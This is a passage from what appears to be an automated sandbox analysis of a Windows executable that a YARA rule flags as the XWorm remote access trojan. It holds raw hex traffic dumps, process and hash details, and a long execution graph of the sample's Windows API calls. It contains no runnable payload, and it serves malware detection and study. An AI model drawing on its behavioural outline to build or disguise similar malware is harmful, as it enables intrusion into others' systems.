                                                                2024-10-26 06:44:31 UTC8000INData Raw: 74 d4 8a cb b5 2e 08 2f 30 fa fa dc 68 d1 9c bf 10 33 8d 07 c3 40 1e 38 30 2d 56 27 ef 94 c1 ae 28 35 2c d0 23 1f e2 37 4d 35 3c 43 b7 4d a2 91 fc e1 eb 38 dc c4 e5 e9 d5 58 9e d3 bb d5 97 4b 4b 90 40 1b 48 f2 08 72 74 59 ed 93 43 2f 35 fb b0 ab 65 cc 0c a6 61 1b b0 f5 8c 65 e5 5c 46 99 f3 eb d6 0e e7 43 a9 06 2a 0a b9 ec 25 d0 90 66 34 6b 93 6e fa 55 6f c7 e9 ad 68 22 8a 9c 88 cc 40 9b b9 19 23 26 38 e3 81 9f 90 db 0a 52 c6 45 69 f3 b8 3d 15 2c 6f 80 0a 91 2c 61 c1 df e7 7c 7a 6a dc 64 e7 1d 7e 18 d9 3d 07 30 82 1e 54 73 4b f1 fd 89 29 13 e8 e7 ed c3 52 69 80 d5 b0 f0 d1 bc 63 a9 8c c8 7e 39 93 3e d1 1a 27 0d 42 a1 87 8c 83 dd cf 93 5f f8 21 aa 69 ea fb 1f 1d 50 3a 85 ec d8 bc e2 94 16 e8 86 5c b7 da 2b e3 a2 13 ac 70 41 8f 99 1d 9c 31 4f f9 14 5a 21 6b
                                                                Data Ascii: t./0h3@80-V'(5,#7M5<CM8XKK@HrtYC/5eae\FC*%f4knUoh"@#&8REi=,o,a|zjd~=0TsK)Ric~9>'B_!iP:\+pA1OZ!k
                                                                2024-10-26 06:44:31 UTC2424INData Raw: 76 08 cd d3 0b f1 48 c0 58 3c 95 a0 f7 b0 93 34 ed 08 59 e0 0c fc c4 3c bf cb 23 06 a7 13 48 02 91 b6 56 95 c7 3a 9c de 11 88 a8 dd ce 58 2a d5 6d a5 00 64 2e 31 bc 83 e0 27 4d 51 b0 15 be f0 e6 c6 87 51 92 f8 b1 f8 88 e7 50 9f 5c 62 5c 77 58 1a 8d 92 c5 4e 8b b8 81 c9 ff 80 b4 0b a0 96 58 0d 96 5f b0 11 08 6e 5f 79 4d c8 b8 32 66 4e ec cc 9e 43 9a b0 b3 66 f5 bb b3 2d d4 30 b4 ba 08 6e 8b 38 29 21 ec 81 4c 01 e2 c0 1e 2b a9 10 45 78 ce 76 67 70 24 03 28 c5 e7 72 c4 a5 7c 16 4b 88 36 ea 4b 70 f5 00 20 59 fa 07 19 38 de c0 07 f8 0e 7c 84 98 f3 90 59 ca bc 41 3a 32 a5 63 16 a5 76 40 a4 d2 49 ba 4d fa 27 2f 1e e8 57 62 eb e4 be ce c6 47 2c 24 4d d9 8c c1 b0 34 73 63 55 ae b6 9b 69 86 c8 8d 5d 67 cb 5e fa 33 4b 39 52 7b 5e 72 bf cd f8 89 70 38 62 86 62 4b bf
                                                                Data Ascii: vHX<4Y<#HV:X*md.1'MQQP\b\wXNX_n_yM2fNCf-0n8)!L+Exvgp$(r|K6Kp Y8|YA:2cv@IM'/WbG,$M4scUi]g^3K9R{^rp8bbK


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:02:43:25
                                                                Start date:26/10/2024
                                                                Path:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\H33UCslPzv.exe"
                                                                Imagebase:0x400000
                                                                File size:3'212'629 bytes
                                                                MD5 hash:9ECAE0D26219DDB2355AD7B597887760
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:02:44:09
                                                                Start date:26/10/2024
                                                                Path:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\H33UCslPzv.exe"
                                                                Imagebase:0x400000
                                                                File size:3'212'629 bytes
                                                                MD5 hash:9ECAE0D26219DDB2355AD7B597887760
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.2750831860.00000000359CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:false

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:20.8%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:16.3%
                                                                  Total number of Nodes:1537
                                                                  Total number of Limit Nodes:50
                                                                  execution_graph 5012 401d41 5013 401d54 GetDlgItem 5012->5013 5014 401d47 5012->5014 5016 401d4e 5013->5016 5015 402b0a 17 API calls 5014->5015 5015->5016 5017 401d8f GetClientRect LoadImageA SendMessageA 5016->5017 5019 402b2c 17 API calls 5016->5019 5020 401deb 5017->5020 5022 4029b8 5017->5022 5019->5017 5021 401df3 DeleteObject 5020->5021 5020->5022 5021->5022 5023 70021000 5026 7002101b 5023->5026 5033 700214bb 5026->5033 5028 70021020 5029 70021027 GlobalAlloc 5028->5029 5030 70021024 5028->5030 5029->5030 5031 700214e2 3 API calls 5030->5031 5032 70021019 5031->5032 5035 700214c1 5033->5035 5034 700214c7 5034->5028 5035->5034 5036 700214d3 GlobalFree 5035->5036 5036->5028 5037 401ec3 5038 402b2c 17 API calls 5037->5038 5039 401ec9 5038->5039 5040 402b2c 17 API calls 5039->5040 5041 401ed2 5040->5041 5042 402b2c 17 API calls 5041->5042 5043 401edb 5042->5043 5044 402b2c 17 API calls 5043->5044 5045 401ee4 5044->5045 5046 401423 24 API calls 5045->5046 5047 401eeb 5046->5047 5054 4056cf ShellExecuteExA 5047->5054 5049 401f29 5050 4063fa 5 API calls 5049->5050 5052 402783 5049->5052 5051 401f43 CloseHandle 5050->5051 5051->5052 5054->5049 4029 401746 4030 402b2c 17 API calls 4029->4030 4031 40174d 4030->4031 4035 405bb5 4031->4035 4033 401754 4034 405bb5 2 API calls 4033->4034 4034->4033 4036 405bc0 GetTickCount GetTempFileNameA 4035->4036 4037 405bf1 4036->4037 4038 405bed 4036->4038 4037->4033 4038->4036 4038->4037 5055 4044c6 5056 4044d6 5055->5056 5057 4044fc 5055->5057 5059 40407b 18 API calls 5056->5059 5058 4040e2 8 API calls 5057->5058 5060 404508 5058->5060 5061 4044e3 SetDlgItemTextA 5059->5061 5061->5057 5062 401947 5063 402b2c 17 API calls 5062->5063 5064 40194e lstrlenA 5063->5064 5065 4025e4 5064->5065 4146 403248 SetErrorMode GetVersion 4147 403289 4146->4147 4148 40328f 4146->4148 4149 406385 5 API calls 4147->4149 4236 406317 GetSystemDirectoryA 4148->4236 4149->4148 4151 4032a5 lstrlenA 4151->4148 4152 4032b4 4151->4152 4239 406385 GetModuleHandleA 4152->4239 4155 406385 5 API calls 4156 4032c2 4155->4156 4157 406385 5 API calls 4156->4157 4158 4032ce #17 OleInitialize SHGetFileInfoA 4157->4158 4245 405fed lstrcpynA 4158->4245 4161 40331a GetCommandLineA 4246 405fed lstrcpynA 4161->4246 4163 40332c 4164 4059b0 CharNextA 4163->4164 4165 403355 CharNextA 4164->4165 4174 403365 4165->4174 4166 40342f 4167 403442 GetTempPathA 4166->4167 4247 403217 4167->4247 4169 40345a 4171 4034b4 DeleteFileA 4169->4171 4172 40345e GetWindowsDirectoryA lstrcatA 4169->4172 4170 4059b0 CharNextA 4170->4174 4257 402dc4 GetTickCount GetModuleFileNameA 4171->4257 4175 403217 12 API calls 4172->4175 4174->4166 4174->4170 4177 403431 4174->4177 4176 40347a 4175->4176 4176->4171 4179 40347e GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4176->4179 4341 405fed lstrcpynA 4177->4341 4178 4034c8 4180 40355e 4178->4180 4183 40354e 4178->4183 4187 4059b0 CharNextA 4178->4187 4182 403217 12 API calls 4179->4182 4358 403730 4180->4358 4185 4034ac 4182->4185 4285 40380a 4183->4285 4185->4171 4185->4180 4189 4034e3 4187->4189 4198 403529 4189->4198 4199 40358e 4189->4199 4190 403696 4192 403718 ExitProcess 4190->4192 4193 40369e GetCurrentProcess OpenProcessToken 4190->4193 4191 403578 4194 405709 MessageBoxIndirectA 4191->4194 4195 4036e9 4193->4195 4196 4036b9 LookupPrivilegeValueA AdjustTokenPrivileges 4193->4196 4200 403586 ExitProcess 4194->4200 4203 406385 5 API calls 4195->4203 4196->4195 4342 405a73 4198->4342 4365 405674 4199->4365 4206 4036f0 4203->4206 4209 403705 ExitWindowsEx 4206->4209 4212 403711 4206->4212 4207 4035a4 lstrcatA 4208 4035af lstrcatA lstrcmpiA 4207->4208 4208->4180 4211 4035cb 4208->4211 4209->4192 4209->4212 4214 4035d0 4211->4214 4215 4035d7 4211->4215 4216 40140b 2 API calls 4212->4216 4213 403543 4357 405fed lstrcpynA 4213->4357 4368 4055da CreateDirectoryA 4214->4368 4373 405657 CreateDirectoryA 4215->4373 4216->4192 4221 4035dc SetCurrentDirectoryA 4222 4035f6 4221->4222 4223 4035eb 4221->4223 4377 405fed lstrcpynA 4222->4377 4376 405fed lstrcpynA 4223->4376 4226 40600f 17 API calls 4227 403635 DeleteFileA 4226->4227 4228 403642 CopyFileA 4227->4228 4233 403604 4227->4233 4228->4233 4229 40368a 4231 405dcc 36 API calls 4229->4231 4231->4180 4232 40600f 17 API calls 4232->4233 4233->4226 4233->4229 4233->4232 4235 403676 CloseHandle 4233->4235 4378 405dcc MoveFileExA 4233->4378 4382 40568c CreateProcessA 4233->4382 4235->4233 4237 406339 wsprintfA LoadLibraryExA 4236->4237 4237->4151 4240 4063a1 4239->4240 4241 4063ab GetProcAddress 4239->4241 4242 406317 3 API calls 4240->4242 4243 4032bb 4241->4243 4244 4063a7 4242->4244 4243->4155 4244->4241 4244->4243 4245->4161 4246->4163 4248 406257 5 API calls 4247->4248 4249 403223 4248->4249 4250 40322d 4249->4250 4385 405985 lstrlenA CharPrevA 4249->4385 4250->4169 4253 405657 2 API calls 4254 40323b 4253->4254 4255 405bb5 2 API calls 4254->4255 4256 403246 4255->4256 4256->4169 4388 405b86 GetFileAttributesA CreateFileA 4257->4388 4259 402e04 4277 402e14 4259->4277 4389 405fed lstrcpynA 4259->4389 4261 402e2a 4390 4059cc lstrlenA 4261->4390 4265 402e3b GetFileSize 4266 402f35 4265->4266 4279 402e52 4265->4279 4395 402d60 4266->4395 4268 402f3e 4270 402f6e GlobalAlloc 4268->4270 4268->4277 4430 403200 SetFilePointer 4268->4430 4406 403200 SetFilePointer 4270->4406 4272 402fa1 4274 402d60 6 API calls 4272->4274 4274->4277 4275 402f57 4278 4031ea ReadFile 4275->4278 4276 402f89 4407 402ffb 4276->4407 4277->4178 4281 402f62 4278->4281 4279->4266 4279->4272 4279->4277 4282 402d60 6 API calls 4279->4282 4427 4031ea 4279->4427 4281->4270 4281->4277 4282->4279 4283 402f95 4283->4277 4283->4283 4284 402fd2 SetFilePointer 4283->4284 4284->4277 4286 406385 5 API calls 4285->4286 4287 40381e 4286->4287 4288 403824 4287->4288 4289 403836 4287->4289 4466 405f4b wsprintfA 4288->4466 4290 405ed4 3 API calls 4289->4290 4291 403861 4290->4291 4293 40387f lstrcatA 4291->4293 4295 405ed4 3 API calls 4291->4295 4294 403834 4293->4294 4451 403acf 4294->4451 4295->4293 4298 405a73 18 API calls 4299 4038b1 4298->4299 4300 40393a 4299->4300 4302 405ed4 3 API calls 4299->4302 4301 405a73 18 API calls 4300->4301 4303 403940 4301->4303 4304 4038dd 4302->4304 4305 403950 LoadImageA 4303->4305 4306 40600f 17 API calls 4303->4306 4304->4300 4309 4038f9 lstrlenA 4304->4309 4313 4059b0 CharNextA 4304->4313 4307 4039f6 4305->4307 4308 403977 RegisterClassA 4305->4308 4306->4305 4311 40140b 2 API calls 4307->4311 4310 4039ad SystemParametersInfoA CreateWindowExA 4308->4310 4340 403a00 4308->4340 4314 403907 lstrcmpiA 4309->4314 4315 40392d 4309->4315 4310->4307 4312 4039fc 4311->4312 4319 403acf 18 API calls 4312->4319 4312->4340 4317 4038f7 4313->4317 4314->4315 4318 403917 GetFileAttributesA 4314->4318 4316 405985 3 API calls 4315->4316 4320 403933 4316->4320 4317->4309 4321 403923 4318->4321 4323 403a0d 4319->4323 4467 405fed lstrcpynA 4320->4467 4321->4315 4322 4059cc 2 API calls 4321->4322 4322->4315 4325 403a19 ShowWindow 4323->4325 4326 403a9c 4323->4326 4328 406317 3 API calls 4325->4328 4459 4051e6 OleInitialize 4326->4459 4330 403a31 4328->4330 4329 403aa2 4331 403aa6 4329->4331 4332 403abe 4329->4332 4333 403a3f GetClassInfoA 4330->4333 4335 406317 3 API calls 4330->4335 4338 40140b 2 API calls 4331->4338 4331->4340 4334 40140b 2 API calls 4332->4334 4336 403a53 GetClassInfoA RegisterClassA 4333->4336 4337 403a69 DialogBoxParamA 4333->4337 4334->4340 4335->4333 4336->4337 4339 40140b 2 API calls 4337->4339 4338->4340 4339->4340 4340->4180 4341->4167 4469 405fed lstrcpynA 4342->4469 4344 405a84 4470 405a1e CharNextA CharNextA 4344->4470 4347 403534 4347->4180 4356 405fed lstrcpynA 4347->4356 4348 406257 5 API calls 4354 405a9a 4348->4354 4349 405ac5 lstrlenA 4350 405ad0 4349->4350 4349->4354 4352 405985 3 API calls 4350->4352 4353 405ad5 GetFileAttributesA 4352->4353 4353->4347 4354->4347 4354->4349 4355 4059cc 2 API calls 4354->4355 4476 4062f0 FindFirstFileA 4354->4476 4355->4349 4356->4213 4357->4183 4359 403748 4358->4359 4360 40373a CloseHandle 4358->4360 4479 403775 4359->4479 4360->4359 4366 406385 5 API calls 4365->4366 4367 403593 lstrcatA 4366->4367 4367->4207 4367->4208 4369 4035d5 4368->4369 4370 40562b GetLastError 4368->4370 4369->4221 4370->4369 4371 40563a SetFileSecurityA 4370->4371 4371->4369 4372 405650 GetLastError 4371->4372 4372->4369 4374 405667 4373->4374 4375 40566b GetLastError 4373->4375 4374->4221 4375->4374 4376->4222 4377->4233 4379 405de0 4378->4379 4380 405ded 4378->4380 4533 405c5c 4379->4533 4380->4233 4383 4056cb 4382->4383 4384 4056bf CloseHandle 4382->4384 4383->4233 4384->4383 4386 403235 4385->4386 4387 40599f lstrcatA 4385->4387 4386->4253 4387->4386 4388->4259 4389->4261 4391 4059d9 4390->4391 4392 402e30 4391->4392 4393 4059de CharPrevA 4391->4393 4394 405fed lstrcpynA 4392->4394 4393->4391 4393->4392 4394->4265 4396 402d81 4395->4396 4397 402d69 4395->4397 4400 402d91 GetTickCount 4396->4400 4401 402d89 4396->4401 4398 402d72 DestroyWindow 4397->4398 4399 402d79 4397->4399 4398->4399 4399->4268 4403 402dc2 4400->4403 4404 402d9f CreateDialogParamA ShowWindow 4400->4404 4431 4063c1 4401->4431 4403->4268 4404->4403 4406->4276 4408 403011 4407->4408 4409 40303f 4408->4409 4448 403200 SetFilePointer 4408->4448 4411 4031ea ReadFile 4409->4411 4412 40304a 4411->4412 4413 403183 4412->4413 4414 40305c GetTickCount 4412->4414 4415 40316d 4412->4415 4416 4031c5 4413->4416 4419 403187 4413->4419 4414->4415 4423 403088 4414->4423 4415->4283 4418 4031ea ReadFile 4416->4418 4417 4031ea ReadFile 4417->4423 4418->4415 4419->4415 4420 4031ea ReadFile 4419->4420 4421 405c2d WriteFile 4419->4421 4420->4419 4421->4419 4422 4030de GetTickCount 4422->4423 4423->4415 4423->4417 4423->4422 4424 403103 MulDiv wsprintfA 4423->4424 4446 405c2d WriteFile 4423->4446 4435 405114 4424->4435 4449 405bfe ReadFile 4427->4449 4430->4275 4432 4063de PeekMessageA 4431->4432 4433 4063d4 DispatchMessageA 4432->4433 4434 402d8f 4432->4434 4433->4432 4434->4268 4436 40512f 4435->4436 4444 4051d2 4435->4444 4437 40514c lstrlenA 4436->4437 4438 40600f 17 API calls 4436->4438 4439 405175 4437->4439 4440 40515a lstrlenA 4437->4440 4438->4437 4442 405188 4439->4442 4443 40517b SetWindowTextA 4439->4443 4441 40516c lstrcatA 4440->4441 4440->4444 4441->4439 4442->4444 4445 40518e SendMessageA SendMessageA SendMessageA 4442->4445 4443->4442 4444->4423 4445->4444 4447 405c4b 4446->4447 4447->4423 4448->4409 4450 4031fd 4449->4450 4450->4279 4452 403ae3 4451->4452 4468 405f4b wsprintfA 4452->4468 4454 403b54 4455 403b88 18 API calls 4454->4455 4457 403b59 4455->4457 4456 40388f 4456->4298 4457->4456 4458 40600f 17 API calls 4457->4458 4458->4457 4460 4040c7 SendMessageA 4459->4460 4462 405209 4460->4462 4461 4040c7 SendMessageA 4463 405242 OleUninitialize 4461->4463 4464 401389 2 API calls 4462->4464 4465 405230 4462->4465 4463->4329 4464->4462 4465->4461 4466->4294 4467->4300 4468->4454 4469->4344 4471 405a39 4470->4471 4473 405a49 4470->4473 4472 405a44 CharNextA 4471->4472 4471->4473 4475 405a69 4472->4475 4474 4059b0 CharNextA 4473->4474 4473->4475 4474->4473 4475->4347 4475->4348 4477 406311 4476->4477 4478 406306 FindClose 4476->4478 4477->4354 4478->4477 4480 403783 4479->4480 4481 40374d 4480->4481 4482 403788 FreeLibrary GlobalFree 4480->4482 4483 4057b5 4481->4483 4482->4481 4482->4482 4484 405a73 18 API calls 4483->4484 4485 4057d5 4484->4485 4486 4057f4 4485->4486 4487 4057dd DeleteFileA 4485->4487 4488 405922 4486->4488 4520 405fed lstrcpynA 4486->4520 4491 403567 OleUninitialize 4487->4491 4488->4491 4494 4062f0 2 API calls 4488->4494 4490 40581a 4492 405820 lstrcatA 4490->4492 4493 40582d 4490->4493 4491->4190 4491->4191 4495 405833 4492->4495 4496 4059cc 2 API calls 4493->4496 4497 405946 4494->4497 4498 405841 lstrcatA 4495->4498 4499 40584c lstrlenA FindFirstFileA 4495->4499 4496->4495 4497->4491 4500 405985 3 API calls 4497->4500 4498->4499 4499->4488 4518 405870 4499->4518 4502 405950 4500->4502 4501 4059b0 CharNextA 4501->4518 4503 40576d 5 API calls 4502->4503 4504 40595c 4503->4504 4505 405960 4504->4505 4506 405976 4504->4506 4505->4491 4511 405114 24 API calls 4505->4511 4507 405114 24 API calls 4506->4507 4507->4491 4508 405901 FindNextFileA 4510 405919 FindClose 4508->4510 4508->4518 4510->4488 4512 40596d 4511->4512 4513 405dcc 36 API calls 4512->4513 4513->4491 4515 4057b5 60 API calls 4515->4518 4516 405114 24 API calls 4516->4508 4517 405114 24 API calls 4517->4518 4518->4501 4518->4508 4518->4515 4518->4516 4518->4517 4519 405dcc 36 API calls 4518->4519 4521 405fed lstrcpynA 4518->4521 4522 40576d 4518->4522 4519->4518 4520->4490 4521->4518 4530 405b61 GetFileAttributesA 4522->4530 4525 40579a 4525->4518 4526 405790 DeleteFileA 4528 405796 4526->4528 4527 405788 RemoveDirectoryA 4527->4528 4528->4525 4529 4057a6 SetFileAttributesA 4528->4529 4529->4525 4531 405779 4530->4531 4532 405b73 SetFileAttributesA 4530->4532 4531->4525 4531->4526 4531->4527 4532->4531 4534 405c82 4533->4534 4535 405ca8 GetShortPathNameA 4533->4535 4560 405b86 GetFileAttributesA CreateFileA 4534->4560 4537 405dc7 4535->4537 4538 405cbd 4535->4538 4537->4380 4538->4537 4540 405cc5 wsprintfA 4538->4540 4539 405c8c CloseHandle GetShortPathNameA 4539->4537 4541 405ca0 4539->4541 4542 40600f 17 API calls 4540->4542 4541->4535 4541->4537 4543 405ced 4542->4543 4561 405b86 GetFileAttributesA CreateFileA 4543->4561 4545 405cfa 4545->4537 4546 405d09 GetFileSize GlobalAlloc 4545->4546 4547 405dc0 CloseHandle 4546->4547 4548 405d2b 4546->4548 4547->4537 4549 405bfe ReadFile 4548->4549 4550 405d33 4549->4550 4550->4547 4562 405aeb lstrlenA 4550->4562 4553 405d4a lstrcpyA 4556 405d6c 4553->4556 4554 405d5e 4555 405aeb 4 API calls 4554->4555 4555->4556 4557 405da3 SetFilePointer 4556->4557 4558 405c2d WriteFile 4557->4558 4559 405db9 GlobalFree 4558->4559 4559->4547 4560->4539 4561->4545 4563 405b2c lstrlenA 4562->4563 4564 405b34 4563->4564 4565 405b05 lstrcmpiA 4563->4565 4564->4553 4564->4554 4565->4564 4566 405b23 CharNextA 4565->4566 4566->4563 4567 401f48 4568 402b2c 17 API calls 4567->4568 4569 401f4e 4568->4569 4570 405114 24 API calls 4569->4570 4571 401f58 4570->4571 4572 40568c 2 API calls 4571->4572 4573 401f5e 4572->4573 4576 402783 4573->4576 4579 401f7f CloseHandle 4573->4579 4580 4063fa WaitForSingleObject 4573->4580 4577 401f73 4577->4579 4585 405f4b wsprintfA 4577->4585 4579->4576 4581 406414 4580->4581 4582 406426 GetExitCodeProcess 4581->4582 4583 4063c1 2 API calls 4581->4583 4582->4577 4584 40641b WaitForSingleObject 4583->4584 4584->4581 4585->4579 5066 401fc8 5067 402b2c 17 API calls 5066->5067 5068 401fcf 5067->5068 5069 406385 5 API calls 5068->5069 5070 401fde 5069->5070 5071 401ff6 GlobalAlloc 5070->5071 5076 40205e 5070->5076 5072 40200a 5071->5072 5071->5076 5073 406385 5 API calls 5072->5073 5074 402011 5073->5074 5075 406385 5 API calls 5074->5075 5077 40201b 5075->5077 5077->5076 5081 405f4b wsprintfA 5077->5081 5079 402052 5082 405f4b wsprintfA 5079->5082 5081->5079 5082->5076 5083 4025c8 5084 402b2c 17 API calls 5083->5084 5085 4025cf 5084->5085 5088 405b86 GetFileAttributesA CreateFileA 5085->5088 5087 4025db 5088->5087 5089 4037c8 5090 4037d3 5089->5090 5091 4037da GlobalAlloc 5090->5091 5092 4037d7 5090->5092 5091->5092 4831 40254c 4832 402b6c 17 API calls 4831->4832 4833 402556 4832->4833 4834 402b0a 17 API calls 4833->4834 4835 40255f 4834->4835 4836 40256d 4835->4836 4841 402783 4835->4841 4837 402586 RegEnumValueA 4836->4837 4838 40257a RegEnumKeyA 4836->4838 4839 4025a2 RegCloseKey 4837->4839 4840 40259b 4837->4840 4838->4839 4839->4841 4840->4839 4878 405252 4879 405274 GetDlgItem GetDlgItem GetDlgItem 4878->4879 4880 4053fd 4878->4880 4924 4040b0 SendMessageA 4879->4924 4882 405405 GetDlgItem CreateThread CloseHandle 4880->4882 4883 40542d 4880->4883 4882->4883 4927 4051e6 5 API calls 4882->4927 4884 40545b 4883->4884 4885 405443 ShowWindow ShowWindow 4883->4885 4886 40547c 4883->4886 4887 405463 4884->4887 4888 4054b6 4884->4888 4926 4040b0 SendMessageA 4885->4926 4893 4040e2 8 API calls 4886->4893 4891 40546b 4887->4891 4892 40548f ShowWindow 4887->4892 4888->4886 4895 4054c3 SendMessageA 4888->4895 4889 4052e4 4894 4052eb GetClientRect GetSystemMetrics SendMessageA SendMessageA 4889->4894 4896 404054 SendMessageA 4891->4896 4898 4054a1 4892->4898 4899 4054af 4892->4899 4897 405488 4893->4897 4900 405359 4894->4900 4901 40533d SendMessageA SendMessageA 4894->4901 4895->4897 4902 4054dc CreatePopupMenu 4895->4902 4896->4886 4905 405114 24 API calls 4898->4905 4906 404054 SendMessageA 4899->4906 4903 40536c 4900->4903 4904 40535e SendMessageA 4900->4904 4901->4900 4907 40600f 17 API calls 4902->4907 4908 40407b 18 API calls 4903->4908 4904->4903 4905->4899 4906->4888 4909 4054ec AppendMenuA 4907->4909 4910 40537c 4908->4910 4911 40550a GetWindowRect 4909->4911 4912 40551d TrackPopupMenu 4909->4912 4913 405385 ShowWindow 4910->4913 4914 4053b9 GetDlgItem SendMessageA 4910->4914 4911->4912 4912->4897 4915 405539 4912->4915 4916 4053a8 4913->4916 4917 40539b ShowWindow 4913->4917 4914->4897 4918 4053e0 SendMessageA SendMessageA 4914->4918 4919 405558 SendMessageA 4915->4919 4925 4040b0 SendMessageA 4916->4925 4917->4916 4918->4897 4919->4919 4920 405575 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4919->4920 4922 405597 SendMessageA 4920->4922 4922->4922 4923 4055b9 GlobalUnlock SetClipboardData CloseClipboard 4922->4923 4923->4897 4924->4889 4925->4914 4926->4884 4934 4014d6 4935 402b0a 17 API calls 4934->4935 4936 4014dc Sleep 4935->4936 4938 4029b8 4936->4938 4939 401759 4940 402b2c 17 API calls 4939->4940 4941 401760 4940->4941 4942 401786 4941->4942 4943 40177e 4941->4943 4979 405fed lstrcpynA 4942->4979 4978 405fed lstrcpynA 4943->4978 4946 401784 4950 406257 5 API calls 4946->4950 4947 401791 4948 405985 3 API calls 4947->4948 4949 401797 lstrcatA 4948->4949 4949->4946 4952 4017a3 4950->4952 4951 4062f0 2 API calls 4951->4952 4952->4951 4953 405b61 2 API calls 4952->4953 4955 4017ba CompareFileTime 4952->4955 4956 40187e 4952->4956 4959 405fed lstrcpynA 4952->4959 4964 40600f 17 API calls 4952->4964 4974 405709 MessageBoxIndirectA 4952->4974 4976 401855 4952->4976 4977 405b86 GetFileAttributesA CreateFileA 4952->4977 4953->4952 4955->4952 4957 405114 24 API calls 4956->4957 4960 401888 4957->4960 4958 405114 24 API calls 4966 40186a 4958->4966 4959->4952 4961 402ffb 31 API calls 4960->4961 4962 40189b 4961->4962 4963 4018af SetFileTime 4962->4963 4965 4018c1 CloseHandle 4962->4965 4963->4965 4964->4952 4965->4966 4967 4018d2 4965->4967 4968 4018d7 4967->4968 4969 4018ea 4967->4969 4971 40600f 17 API calls 4968->4971 4970 40600f 17 API calls 4969->4970 4973 4018f2 4970->4973 4972 4018df lstrcatA 4971->4972 4972->4973 4973->4966 4975 405709 MessageBoxIndirectA 4973->4975 4974->4952 4975->4966 4976->4958 4976->4966 4977->4952 4978->4946 4979->4947 5096 401659 5097 402b2c 17 API calls 5096->5097 5098 40165f 5097->5098 5099 4062f0 2 API calls 5098->5099 5100 401665 5099->5100 5101 401959 5102 402b0a 17 API calls 5101->5102 5103 401960 5102->5103 5104 402b0a 17 API calls 5103->5104 5105 40196d 5104->5105 5106 402b2c 17 API calls 5105->5106 5107 401984 lstrlenA 5106->5107 5109 401994 5107->5109 5108 4019d4 5109->5108 5113 405fed lstrcpynA 5109->5113 5111 4019c4 5111->5108 5112 4019c9 lstrlenA 5111->5112 5112->5108 5113->5111 4980 4024da 4981 402b6c 17 API calls 4980->4981 4982 4024e4 4981->4982 4983 402b2c 17 API calls 4982->4983 4984 4024ed 4983->4984 4985 4024f7 RegQueryValueExA 4984->4985 4989 402783 4984->4989 4986 40251d RegCloseKey 4985->4986 4987 402517 4985->4987 4986->4989 4987->4986 4991 405f4b wsprintfA 4987->4991 4991->4986 5114 401cda 5115 402b0a 17 API calls 5114->5115 5116 401ce0 IsWindow 5115->5116 5117 401a0e 5116->5117 5118 402cdd 5119 402d05 5118->5119 5120 402cec SetTimer 5118->5120 5121 402d5a 5119->5121 5122 402d1f MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5119->5122 5120->5119 5122->5121 5123 401a5e 5124 402b0a 17 API calls 5123->5124 5125 401a67 5124->5125 5126 402b0a 17 API calls 5125->5126 5127 401a0e 5126->5127 5128 40485e 5129 40488a 5128->5129 5130 40486e 5128->5130 5132 404890 SHGetPathFromIDListA 5129->5132 5133 4048bd 5129->5133 5139 4056ed GetDlgItemTextA 5130->5139 5135 4048a0 5132->5135 5136 4048a7 SendMessageA 5132->5136 5134 40487b SendMessageA 5134->5129 5137 40140b 2 API calls 5135->5137 5136->5133 5137->5136 5139->5134 3941 70022921 3942 70022971 3941->3942 3943 70022931 VirtualProtect 3941->3943 3943->3942 3944 401b63 3945 401bb4 3944->3945 3950 401b70 3944->3950 3947 401bb8 3945->3947 3948 401bdd GlobalAlloc 3945->3948 3946 40233b 3949 40600f 17 API calls 3946->3949 3958 401bf8 3947->3958 3982 405fed lstrcpynA 3947->3982 3963 40600f 3948->3963 3952 402348 3949->3952 3950->3946 3953 401b87 3950->3953 3952->3958 3983 405709 3952->3983 3980 405fed lstrcpynA 3953->3980 3956 401bca GlobalFree 3956->3958 3957 401b96 3981 405fed lstrcpynA 3957->3981 3961 401ba5 3987 405fed lstrcpynA 3961->3987 3968 40601c 3963->3968 3964 40623e 3965 406253 3964->3965 4004 405fed lstrcpynA 3964->4004 3965->3958 3967 406218 lstrlenA 3967->3968 3968->3964 3968->3967 3969 40600f 10 API calls 3968->3969 3972 406134 GetSystemDirectoryA 3968->3972 3974 406147 GetWindowsDirectoryA 3968->3974 3976 40600f 10 API calls 3968->3976 3977 4061c1 lstrcatA 3968->3977 3978 40617b SHGetSpecialFolderLocation 3968->3978 3988 405ed4 3968->3988 3993 406257 3968->3993 4002 405f4b wsprintfA 3968->4002 4003 405fed lstrcpynA 3968->4003 3969->3967 3972->3968 3974->3968 3976->3968 3977->3968 3978->3968 3979 406193 SHGetPathFromIDListA CoTaskMemFree 3978->3979 3979->3968 3980->3957 3981->3961 3982->3956 3984 40571e 3983->3984 3985 40576a 3984->3985 3986 405732 MessageBoxIndirectA 3984->3986 3985->3958 3986->3985 3987->3958 4005 405e73 3988->4005 3991 405f37 3991->3968 3992 405f08 RegQueryValueExA RegCloseKey 3992->3991 3994 406263 3993->3994 3996 4062c0 CharNextA 3994->3996 3998 4062cb 3994->3998 4000 4062ae CharNextA 3994->4000 4001 4062bb CharNextA 3994->4001 4009 4059b0 3994->4009 3995 4062cf CharPrevA 3995->3998 3996->3994 3996->3998 3998->3995 3999 4062ea 3998->3999 3999->3968 4000->3994 4001->3996 4002->3968 4003->3968 4004->3965 4006 405e82 4005->4006 4007 405e86 4006->4007 4008 405e8b RegOpenKeyExA 4006->4008 4007->3991 4007->3992 4008->4007 4010 4059b6 4009->4010 4011 4059c9 4010->4011 4012 4059bc CharNextA 4010->4012 4011->3994 4012->4010 4013 402363 4014 40236b 4013->4014 4017 